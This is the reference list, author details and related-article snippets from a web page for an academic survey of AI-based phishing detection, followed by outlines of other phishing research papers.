(2019). APWG trend report. https://docs.apwg.org/reports/apwg_trends_report_q3_2019.pdf. Accessed 20 July 2020

(2019). FBI warns of dramatic increase in business e-mail compromise (BEC) schemes. https://www.fbi.gov/contact-us/field-offices/memphis/news/press-releases/fbi-warns-of-dramatic-increase-in-business-e-mail-compromise-bec-schemes. Accessed 20 July 2020

(2019). What is phishing? https://www.phishing.org/what-is-phishing. Accessed 20 July 2020

(2020). Coronavirus-related spear phishing attacks see 667% increase. https://www.securitymagazine.com/articles/92157-coronavirus-related-spear-phishing-attacks-see-667-increase-in-march-2020. Accessed 20 July 2020

(2020). Cost of black market phishing kits soars 149% in 2019. https://www.infosecurity-magazine.com/news/black-phishing-kits/. Accessed 20 July 2020

(2020). Recent phishing attacks. https://www.infosec.gov.hk/english/anti/recent.html. Accessed 20 July 2020

Abdelhamid, N., Thabtah, F., Abdel-jaber, H. (2017). Phishing detection: A recent intelligent machine learning comparison based on models content and features. In 2017 IEEE international conference on intelligence and security informatics (ISI) (pp. 72–77). IEEE.

Adebowale, M. A., Lwin, K. T., Sanchez, E., & Hossain, M. A. (2019). Intelligent web-phishing detection and protection scheme using integrated features of images, frames and text. Expert Systems with Applications , 115 , 300–313.


Aleroud, A., & Zhou, L. (2017). Phishing environments, techniques, and countermeasures: A survey. Computers and Security , 68 , 160–196.

Ali, W., & Malebary, S. (2020). Particle swarm optimization-based feature weighting for improving intelligent phishing website detection. IEEE Access , 8 , 116766–116780.

Alsariera, Y. A., Adeyemo, V. E., Balogun, A. O., & Alazzawi, A. K. (2020). Ai meta-learners and extra-trees algorithm for the detection of phishing websites. IEEE Access , 8 , 142532–142542.

Begum, A., & Badugu, S. (2020). A study of malicious url detection using machine learning and heuristic approaches. In Advances in decision sciences, security and computer vision, image processing (pp. 587–597). Berlin: Springer.

Benavides, E., Fuertes, W., Sanchez, S., & Sanchez, M. (2020). Classification of phishing attack solutions by employing deep learning techniques: A systematic literature review. In Developments and advances in defense and security (pp. 51–64). Springer.

Cabaj, K., Domingos, D., Kotulski, Z., & Respício, A. (2018). Cybersecurity education: Evolution of the discipline and analysis of master programs. Computers and Security , 75 , 24–35.

Chen, Y. H., & Chen, J. L. (2019). Ai@ ntiphish—machine learning mechanisms for cyber-phishing attack. IEICE Transactions on Information and Systems , 102 (5), 878–887.

Chiew, K. L., Yong, K. S. C., & Tan, C. L. (2018). A survey of phishing attacks: Their types, vectors and technical approaches. Expert Systems with Applications , 106 , 1–20.

Chiew, K. L., Tan, C. L., Wong, K., Yong, K. S., & Tiong, W. K. (2019). A new hybrid ensemble feature selection framework for machine learning-based phishing detection system. Information Sciences , 484 , 153–166.

Conklin, W. A., Cline, R. E., & Roosa, T. (2014). Re-engineering cybersecurity education in the us: An analysis of the critical factors. In 2014 47th Hawaii international conference on system sciences (pp. 2006–2014). IEEE.

Curtis, S. R., Rajivan, P., Jones, D. N., & Gonzalez, C. (2018). Phishing attempts among the dark triad: Patterns of attack and vulnerability. Computers in Human Behavior , 87 , 174–182.

El Aassal, A., Baki, S., Das, A., & Verma, R. M. (2020). An in-depth benchmarking and evaluation of phishing detection research for security needs. IEEE Access , 8 , 22170–22192.

Fatima, R., Yasin, A., Liu, L., & Wang, J. (2019). How persuasive is a phishing email? A phishing game for phishing awareness. Journal of Computer Security , 27 (6), 581–612.

Feng, Q., Tseng, K. K., Pan, J. S., Cheng, P., & Chen, C. (2011). New anti-phishing method with two types of passwords in openid system. In 2011 Fifth international conference on genetic and evolutionary computing (pp. 69–72). IEEE.

Ferrag, M. A., Maglaras, L., Moschoyiannis, S., & Janicke, H. (2020). Deep learning for cyber security intrusion detection: Approaches, datasets, and comparative study. Journal of Information Security and Applications , 50 , 102419.

Forecast. (2017). Global fraud and cybercrime forecast. https://www.rsa.com/en-us/blog/2016-12/2017-global-fraud-cybercrime-forecast . Accessed from 20 July 2020

Gupta, B. B., Tewari, A., Jain, A. K., & Agrawal, D. P. (2017). Fighting against phishing attacks: State of the art and future challenges. Neural Computing and Applications , 28 (12), 3629–3654.

Gupta, B. B., Arachchilage, N. A., & Psannis, K. E. (2018). Defending against phishing attacks: Taxonomy of methods, current issues and future directions. Telecommunication Systems , 67 (2), 247–267.

Hota, H., Shrivas, A., & Hota, R. (2018). An ensemble model for detecting phishing attack with proposed remove-replace feature selection technique. Procedia Computer Science , 132 , 900–907.

Hulten, G. J., Rehfuss, P. S., Rounthwaite, R., Goodman, J. T., Seshadrinathan, G., Penta, A. P., Mishra, M., Deyo, R. C., Haber, E. J., & Snelling, D. A. W. et al. (2014). Finding phishing sites . US Patent 8,839,418.

Hutchinson, S., Zhang, Z., & Liu, Q. (2018). Detecting phishing websites with random forest. In International conference on machine learning and intelligent communications (pp. 470–479). Springer.

Iwendi, C., Jalil, Z., Javed, A. R., Reddy, T., Kaluri, R., Srivastava, G., et al. (2020). Keysplitwatermark: Zero watermarking algorithm for software protection against cyber-attacks. IEEE Access , 8 , 72650–72660.

Jagadeesan, S., Chaturvedi, A., & Kumar, S. (2018). Url phishing analysis using random forest. International Journal of Pure and Applied Mathematics , 118 (20), 4159–4163.


Jain, A. K., & Gupta, B. B. (2018). Towards detection of phishing websites on client-side using machine learning based approach. Telecommunication Systems , 68 (4), 687–700.

Jain, A. K., Parashar, S., Katare, P., & Sharma, I. (2020). Phishskape: A content based approach to escape phishing attacks. Procedia Computer Science , 171 , 1102–1109.

James, J., Sandhya, L., & Thomas, C. (2013). Detection of phishing urls using machine learning techniques. In 2013 International conference on control communication and computing (ICCC) (pp. 304–309). IEEE.

Javed, A. R., Jalil, Z., Moqurrab, S. A., Abbas, S., & Liu, X. (2020). Ensemble adaboost classifier for accurate and fast detection of botnet attacks in connected vehicles. Transactions on Emerging Telecommunications Technologies .

Javed, A. R., Usman, M., Rehman, S. U., Khan, M. U., & Haghighi, M. S. (2020). Anomaly detection in automated vehicles using multistage attention-based convolutional neural network. IEEE Transactions on Intelligent Transportation Systems , pp. 1–10.

Joshi, A., Pattanshetti, P., & Tanuja, R. (2019). Phishing attack detection using feature selection techniques. In International conference on communication and information processing (ICCIP), Nutan College of Engineering and Research .

Khonji, M., Iraqi, Y., & Jones, A. (2013). Phishing detection: A literature survey. IEEE Communications Surveys and Tutorials , 15 (4), 2091–2121.

Kumar, A., Chatterjee, J. M., & Díaz, V. G. (2020). A novel hybrid approach of svm combined with nlp and probabilistic neural network for email phishing. International Journal of Electrical and Computer Engineering , 10 (1), 486.

Li, Y., Yang, Z., Chen, X., Yuan, H., & Liu, W. (2019). A stacking model using url and html features for phishing webpage detection. Future Generation Computer Systems , 94 , 27–39.

Liew, S. W., Sani, N. F. M., Abdullah, M. T., Yaakob, R., & Sharum, M. Y. (2019). An effective security alert mechanism for real-time phishing tweet detection on twitter. Computers and Security , 83 , 201–207.

Mao, J., Bian, J., Tian, W., Zhu, S., Wei, T., Li, A., et al. (2018). Detecting phishing websites via aggregation analysis of page layouts. Procedia Computer Science , 129 , 224–230.

Mao, J., Bian, J., Tian, W., Zhu, S., Wei, T., Li, A., et al. (2019). Phishing page detection via learning classifiers from page layout feature. EURASIP Journal on Wireless Communications and Networking , 2019 (1), 43.

Maurya, S., & Jain, A. (2020). Deep learning to combat phishing. Journal of Statistics and Management Systems , pp. 1–13.

Mittal, M., Iwendi, C., Khan, S., & Rehman Javed, A. (2020). Analysis of security and energy efficiency for shortest route discovery in low-energy adaptive clustering hierarchy protocol using Levenberg–Marquardt neural network and gated recurrent unit for intrusion detection system. Transactions on Emerging Telecommunications Technologies , p. e3997.

Niranjan, A., Haripriya, D., Pooja, R., Sarah, S., Shenoy, P. D., & Venugopal, K. (2019). Ekrv: Ensemble of knn and random committee using voting for efficient classification of phishing. In Progress in advanced computing and intelligent engineering (pp. 403–414). Springer.

Ollmann, G. (2004). The phishing guide understanding and preventing phishing attacks . NGS Software Insight Security Research.

Pandey, A., Gill, N., Nadendla, K. S. P., & Thaseen, I. S. (2018). Identification of phishing attack in websites using random forest-svm hybrid model. In International conference on intelligent systems design and applications (pp. 120–128). Springer.

Parekh, S., Parikh, D., Kotak, S., & Sankhe, S. (2018). A new method for detection of phishing websites: Url detection. In 2018 Second international conference on inventive communication and computational technologies (ICICCT) (pp. 949–952). IEEE.

Parsons, K., Butavicius, M., Delfabbro, P., & Lillie, M. (2019). Predicting susceptibility to social influence in phishing emails. International Journal of Human-Computer Studies , 128 , 17–26.

Patil, V., Thakkar, P., Shah, C., Bhat, T., & Godse, S. (2018). Detection and prevention of phishing websites using machine learning approach. In 2018 Fourth international conference on computing communication control and automation (ICCUBEA) (pp. 1–5). IEEE.

Sahingoz, O. K., Buber, E., Demir, O., & Diri, B. (2019). Machine learning based phishing detection from urls. Expert Systems with Applications , 117 , 345–357.

Shie, E. W. S. (2020). Critical analysis of current research aimed at improving detection of phishing attacks . Selected computing research papers, p. 45.

Subasi, A., & Kremic, E. (2020). Comparison of adaboost with multiboosting for phishing website detection. Procedia Computer Science , 168 , 272–278.

Subasi, A., Molah, E., Almkallawi, F., & Chaudhery, T. J. (2017). Intelligent phishing website detection using random forest classifier. In 2017 International conference on electrical and computing technologies and applications (ICECTA) (pp. 1–5). IEEE.

Tyagi, I., Shad, J., Sharma, S., Gaur, S., & Kaur, G. (2018). A novel machine learning approach to detect phishing websites. In 2018 5th International conference on signal processing and integrated networks (SPIN) (pp. 425–430). IEEE.

Ubing, A. A., Jasmi, S. K. B., Abdullah, A., Jhanjhi, N., & Supramaniam, M. (2019). Phishing website detection: An improved accuracy through feature selection and ensemble learning. International Journal of Advanced Computer Science and Applications , 10 (1), 252–257.

Volkamer, M., Renaud, K., Reinheimer, B., & Kunz, A. (2017). User experiences of torpedo: Tooltip-powered phishing email detection. Computers and Security , 71 , 100–113.

Vrbančič, G., Fister Jr, I., & Podgorelec, V. (2018). Swarm intelligence approaches for parameter setting of deep learning neural network: Case study on phishing websites classification. In Proceedings of the 8th international conference on web intelligence, mining and semantics (pp. 1–8).

Williams, E. J., Hinds, J., & Joinson, A. N. (2018). Exploring susceptibility to phishing in the workplace. International Journal of Human-Computer Studies , 120 , 1–13.

Yao, W., Ding Y., & Li, X. (2018). Logophish: A new two-dimensional code phishing attack detection method. In 2018 IEEE international conference on parallel and distributed processing with applications, ubiquitous computing and communications, big data and cloud computing, social computing and networking, sustainable computing and communications (ISPA/IUCC/BDCloud/SocialCom/SustainCom) (pp. 231–236). IEEE.

Yasin, A., Fatima, R., Liu, L., Yasin, A., & Wang, J. (2019). Contemplating social engineering studies and attack scenarios: A review study. Security and Privacy , 2 (4), e73.

Zamir, A., Khan, H. U., Iqbal, T., Yousaf, N., Aslam, F., Anjum, A., et al. (2020). Phishing web site detection using diverse machine learning algorithms. The Electronic Library .


Author information

Authors and affiliations.

Department of Computer Science, Air University, E-9, Islamabad, Pakistan

Abdul Basit & Maham Zafar

School of Information Engineering, Yangzhou University, Yangzhou, China

Department of Cyber Security, Air University, E-9, Islamabad, Pakistan

Abdul Rehman Javed, Zunera Jalil & Kashif Kifayat


Corresponding author

Correspondence to Xuan Liu .

Additional information

Publisher's note.

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.


About this article

Basit, A., Zafar, M., Liu, X. et al. A comprehensive survey of AI-enabled phishing attacks detection techniques. Telecommun Syst 76 , 139–154 (2021). https://doi.org/10.1007/s11235-020-00733-2


Accepted : 09 October 2020

Published : 23 October 2020

Issue Date : January 2021

DOI : https://doi.org/10.1007/s11235-020-00733-2


Phishing attack
Security threats
Advanced phishing techniques
Cyberattack
Internet security
Machine learning
Deep learning
Hybrid learning

COMMENTS

Phishing Attacks: A Recent Comprehensive Study and a New Anatomy
Phishing is a field of study that merges social psychology, technical systems, security subjects, and politics. Phishing attacks are more prevalent: a recent study ( Proofpoint, 2020) found that nearly 90% of organizations faced targeted phishing attacks in 2019.
Mitigation strategies against the phishing attacks: A systematic
In line with the research questions, the paper identifies and classifies existing mitigation strategies against the phishing attacks. Most of the mitigation strategies are based on machine learning algorithms as the underlying technology.
How Good Are We at Detecting a Phishing Attack? Investigating the
The paper documents a study that presented test participants with five different categories of emails (including phishing and non phishing) . The findings from the study show that participants, generally, found it difficult to detect modern phishing email attacks.
A systematic literature review on phishing website ...
Phishing is a fraud attempt in which an attacker acts as a trusted person or entity to obtain sensitive information from an internet user. In this Systematic Literature Survey (SLR), different phishing detection approaches, namely Lists Based, Visual Similarity, Heuristic, Machine Learning, and Deep Learning based techniques, are studied and ...
Phishing Attacks: A Recent Comprehensive Study and a New Anatomy
This article proposes a new detailed anatomy of phishing which involves attack phases, attacker's types, vulnerabilities, threats, targets, attack mediums, and attacking techniques.
The Scams Among Us: Who Falls Prey and Why
On April 17, 2020, Google announced that it had blocked a staggering 126 million phishing scams related to COVID-19, the disease caused by the 2019 novel coronavirus, in a single week. This was the most intense and extensive phishing attack in the company's history ( Kumaran & Lugani, 2020 ).
An effective detection approach for phishing websites using URL and
This paper provides an efficient solution for phishing detection that extracts the features from website's URL and HTML source code.
Life-long phishing attack detection using continual learning
This paper explores continual learning (CL) techniques for sustained phishing detection performance over time. To demonstrate this behavior, we collect phishing and benign samples for three ...
Human Factors in Phishing Attacks: A Systematic Literature Review
The analysis of the retrieved publications, framed along the research questions addressed in the systematic literature review, helps in understanding how human factors should be considered to defend against phishing attacks. Future research directions are also highlighted.
All About Phishing Exploring User Research through a Systematic
The central role played by the user in phishing attacks is precisely why we wish to better understand the current state of user-centered phishing research, including a wide range of methodological approaches and potentially significant attack attributes.
A comprehensive survey of AI-enabled phishing attacks detection
This paper also presents the comparison of different studies detecting the phishing attack for each AI technique and examines the qualities and shortcomings of these methodologies. Furthermore, this paper provides a comprehensive set of current challenges of phishing attacks and future research direction in this domain.
Applications of deep learning for phishing detection: a systematic
Phishing attacks aim to steal confidential information using sophisticated methods, techniques, and tools such as phishing through content injection, social engineering, online social networks, and mobile applications. To avoid and mitigate the risks of these attacks, several phishing detection approaches were developed, among which deep learning algorithms provided promising results. However ...
A Systematic Review on Deep-Learning-Based Phishing Email Detection
To develop a comprehensive understanding of the current state of research on the use of deep learning techniques for phishing detection, a systematic literature review is necessary. This review aims to identify the various deep learning techniques used for phishing detection, their effectiveness, and areas for future research.
Detecting Phishing Domains Using Machine Learning
Phishing is an online threat where an attacker impersonates an authentic and trustworthy organization to obtain sensitive information from a victim. One example of such is trolling, which has long been considered a problem. However, recent advances in phishing detection, such as machine learning-based methods, have assisted in combatting these attacks. Therefore, this paper develops and ...
Phishing Website Detection Using Machine Learning
Phishing is an internet scam in which an attacker sends out fake messages that look to come from a trusted source. A URL or file will be included in the mail, which when clicked will steal personal information or infect a computer with a virus. Traditionally, phishing attempts were carried out through wide-scale spam campaigns that targeted broad groups of people indiscriminately. The goal was ...
APWG
Phishing Activity Trends Reports The APWG Phishing Activity Trends Report analyzes phishing attacks reported to the APWG by its member companies, its Global Research Partners, through the organization's website at https://apwg.org , and by e-mail submissions to [email protected]. APWG also measures the evolution, proliferation, and propagation of crimeware by drawing from the research ...
Phishing in Organizations: Findings from a Large-Scale and Long-Term Study
Abstract—In this paper, we present findings from a large-scale and long-term phishing experiment that we conducted in collaboration with a partner company. Our experiment ran for 15 months during which time more than 14,000 study participants (employees of the company) received different simulated phishing emails in their normal working context.
A Systematic Literature Review on Phishing Email Detection Using
Every year, phishing results in losses of billions of dollars and is a major threat to the Internet economy. Phishing attacks are now most often carried out by email. To better comprehend the existing research trend of phishing email detection, several review studies have been performed. However, it is important to assess this issue from different perspectives. None of the surveys have ever ...
Phishing Detection: A Literature Survey
This article surveys the literature on the detection of phishing attacks. Phishing attacks target vulnerabilities that exist in systems due to the human factor. Many cyber attacks are spread via mechanisms that exploit weaknesses found in end-users, which makes users the weakest element in the security chain. The phishing problem is broad and no single silver-bullet solution exists to mitigate ...
A Systematic Literature Review on Phishing and Anti-Phishing Techniques
... to find out different types of phishing and anti-phishing techniques. The research study found that spear phishing, email spoofing, email manipulation and phone phishing are the most commonly used phishing techniques. On the other hand, according to the SLR, machine learning approaches have the highest accuracy of preventing ...
(PDF) Study on Phishing Attacks
Phishing is. one such type of methodologies which are used to acquire the. information. Phishing is a cyber crime in which emails, telephone, text messages, personally identifiable information ...
PDF 2023 Internet Crime Report
2023 INTERNET CRIME REPORT INTRODUCTION Dear Reader, ... Phishing/Spoofing: The use of unsolicited email, text messages, and telephone calls purportedly from a legitimate company requesting personal, financial, and/or login credentials.
Rivers of Phish: Sophisticated Phishing Targets Russia's Perceived
A sophisticated spear phishing campaign has been targeting Western and Russian civil society. In collaboration with Access Now, and with the participation of numerous civil society organizations, we uncover this operation and link it to COLDRIVER, a group attributed by multiple governments to the Russian Federal Security Service (FSB).
Abnormal Security Announces H2 2024 Email Threat Report
SAN FRANCISCO, August 14, 2024 - Abnormal Security, the leader in AI-native human behavior security, today released its H2 2024 Email Threat Report, revealing the growing threat of file-sharing phishing attacks, whereby threat actors use popular file-hosting or e-signature solutions as a disguise to manipulate their targets into revealing private information or downloading malware.
Microsoft's AI Can Be Turned Into an Automated Phishing Machine
Attacks on Microsoft's Copilot AI allow for answers to be manipulated, data extracted, and security protections bypassed, new research shows.
Iranian backed group steps up phishing campaigns against Israel, U.S
Today Google's Threat Analysis Group (TAG) is sharing insights on APT42, an Iranian government-backed threat actor, and their targeted phishing campaigns against Israel and Israeli targets. We are also confirming recent reports around APT42's targeting of accounts associated with the U.S. presidential election. Associated with Iran's Islamic Revolutionary Guard Corps (IRGC), APT42 ...
12th August
At the time the report was published, Ivanti had yet to release a patch and Fortinet decided not to fix the custom encryption key bypass. ... Check Point Research Publications; Global Cyber Attack Reports; Threat Research; February 17, 2020 "The Turkish Rat" Evolved Adwind in a Massive Ongoing Phishing Campaign. Check Point Research ...
Five Offbeat Phishing Schemes To Know: New Twists On Classic Scams
The fundamental nature of phishing—replicating authentic communications to deceive individuals into taking action—remains unchanged.
Stealthy phishing attack uses advanced infostealer for data exfiltration
Phishing attacks featuring an advanced, stealthy technique designed to exfiltrate a wide range of sensitive information have been observed by Barracuda threat analysts.
A comprehensive survey of AI-enabled phishing attacks detection
The time lost on remediation after a phishing attack can have a damaging impact on the productivity and profitability of businesses. In the current scenario, organizations need to provide their employees with awareness and feasible solutions to detect and report phishing attacks proactively and promptly before it causes any harm.

Introduction

Phishing Definitions

Real-World Phishing Examples

Developing a Phishing Campaign

Historical Overview

The Latest Statistics of Phishing Attacks

What Attributes Make Some People More Susceptible to Phishing Attacks Than Others

Proposed Phishing Anatomy

Planning Phase

Attack Preparation

Attack Conducting Phase

Valuables Acquisition Phase

Types and Techniques of Phishing Attacks

Deceptive Phishing

Phishing e-Mail

Spoofed Website

Phone Phishing (Vishing and SMishing)

Social Media Attack (Soshing, Social Media Phishing)

Technical Subterfuge

Malware-Based Phishing

Key Loggers and Screen Loggers

Viruses and Worms

Session Hijackers

Web Trojans

Hosts File Poisoning

System Reconfiguration Attack

Domain Name System Based Phishing (Pharming)

Content Injection Phishing

Man-In-The-Middle Phishing

Search Engine Phishing

URL and HTML Obfuscation Attacks

Countermeasures

Human Education (Improving User Awareness About Phishing)

Technical Solutions

Solutions Provided by Legislations as a Deterrent Control

Author Contributions

Conflict of Interest

Life-long phishing attack detection using continual learning

Related Work

URL features based detection

Content based detection

Visual and hybrid features based detection

Research tools and methods

Embedding Techniques in ML

TL Techniques

Methodology

Data pre-processing and features extraction

Experiments and results

Experiments with VNN

Experiments with TL

Experiments with CL: learning without forgetting

Experiments with CL: elastic weight consolidation

Performance comparison of continual learning

Accuracy comparison

Confusion matrices

Discussions

Conclusion and future work

Data availability

Author information

Contributions

Corresponding author

Ethics declarations

Additional information

Human Factors in Phishing Attacks: A Systematic Literature Review

Information & Contributors

Index Terms
